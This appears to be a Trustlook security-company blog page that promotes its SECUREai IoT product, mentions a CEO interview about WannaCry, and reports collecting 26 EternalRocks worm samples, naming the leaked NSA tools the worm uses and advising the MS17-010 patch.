Trustlook SECUREai IoT revolutionizes IoT security with a custom, embeddable engine built on artificial intelligence. SECUREai IoT is a device-behavior-based solution that detects threats that existing perimeter and network-based products fail to stop. Now smart cars, thermostats, critical industrial sensors, and millions of other connected devices can be built with security on the inside, and take advantage of Trustlook’s powerful artificial intelligence technology.


Trustlook CEO Allan Zhang Interviewed by vpnMentor

Allan Zhang, co-founder and CEO of Trustlook, was recently interviewed by vpnMentor. Allan answers the following questions:

  • Please provide some background on Trustlook.
  • How can AI be used to enhance cybersecurity?
  • In your opinion, what led us to the WannaCry attack? Could it have been predicted?
  • What can you tell us about your solution to the Wannacry attack?
  • Who is your typical client?

You can read the entire interview here. We’d like to thank Ditsa Keren and her team at vpnMentor for their help putting together this interview.

Trustlook Has Identified 26 EternalRocks Samples

Trustlook has collected 26 samples from the EternalRocks attack – an attack that comes on the heels of the devastating WannaCry Ransomware attack from last week. The hash for each of the 26 samples is listed below.

EternalRocks uses seven tools from the NSA toolkit leaked in April by the Shadow Brokers group: the SMB exploits EternalBlue, EternalChampion, EternalRomance and EternalSynergy, the DoublePulsar backdoor, and the reconnaissance tools ArchiTouch and SMBTouch. For reference, WannaCry used only two of them (EternalBlue and DoublePulsar), leading some to believe that EternalRocks could pose a bigger problem than WannaCry.

It is unclear what EternalRocks will do to the computers it has infected. For now it remains dormant while it continues to spread to more machines, but it could be weaponized at any time and strike suddenly.

Users should make it a habit to patch their systems regularly and promptly. The single best thing you can do to protect your networks against malware, worms and ransomware is to patch known vulnerabilities; for the SMB exploits listed above, that means applying the MS17-010 update.

Stay tuned to Trustlook’s blog for further updates on EternalRocks…